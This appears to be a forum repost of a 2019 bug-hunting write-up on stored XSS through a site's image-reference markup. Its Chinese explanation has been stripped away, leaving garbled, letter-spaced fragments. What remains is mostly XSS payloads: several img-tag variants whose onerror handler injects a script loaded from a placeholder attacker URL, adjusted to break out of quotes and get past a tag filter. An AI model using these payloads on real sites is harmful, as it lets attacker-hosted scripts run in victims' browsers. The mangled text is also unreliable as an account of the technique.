[18503] 2019-12-08_漏洞挖掘一处图片引用功能导致的XSS

文档创建者:s7ckTeam
浏览次数:15
最后更新:2025-01-18
2019-12-08_漏洞挖掘一处图片引用功能导致的XSS   |   X S S   S e 7 n s e c   H A C K   2 0 1 9 - 1 2 - 0 8 X S S T a g s   a r e   n o t   p e r m i t t e d   <     > b u r p x s s   p a y l o a d x s s a s p x h t m l x s s   i m g  
s r c l o g o p a y l o a d x s s   p a y l o a d   [ i m g | X S S U R L | x x x x x   L o g o ] p a y l o a d < i m g   s r c = x   o n e r r o r = s = c r e a t e E l e m e n t ( ' s c r i p t ' ) ; b o d y . a p p e n d C h i l d ( s ) ; s . s r c = ' X S S U R L ' ; > p a y l o a d [ i m g | x   o n e r r o r = s = c r e a t e E l e m e n t ( ' s c r i p t ' ) ; b o d y . a p p e n d C h i l d ( s ) ; s . s r c = ' X S S U R L ' ; | x x x x x   L o g o ]
  x     o n e r r o r   p a y l o a d   o n e r r o r =     ;     >   [ i m g | x "   o n e r r o r = s = c r e a t e E l e m e n t ( ' s c r i p t ' ) ; b o d y . a p p e n d C h i l d ( s ) ; s . s r c = ' X S S U R L ' ; | h e l l o ] [ i m g | x "   o n e r r o r = s = c r e a t e E l e m e n t ( ' s c r i p t ' ) ; b o d y . a p p e n d C h i l d ( s ) ; s . s r c = ' X S S U R L ' ; > | h e l l o ]
  ;   x s s   p a y l o a d x s s g a n g d u [ i m g | x "   o n e r r o r = s = c r e a t e E l e m e n t ( ' s c r i p t ' ) ; b o d y . a p p e n d C h i l d ( s ) ; s . s r c = ' X S S U R L ' ; " | h e l l o ]
p a y l o a d p a y l o a d x   o n e r r o r = s = c r e a t e E l e m e n t ( ' s c r i p t ' ) ; b o d y . a p p e n d C h i l d ( s ) ; s . s r c = ' X S S U R L ' ; x "   o n e r r o r = " s = c r e a t e E l e m e n t ( ' s c r i p t ' ) ; b o d y . a p p e n d C h i l d ( s ) ; s . s r c = ' X S S U R L ' ;
稿 :   S e 7 n s e c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则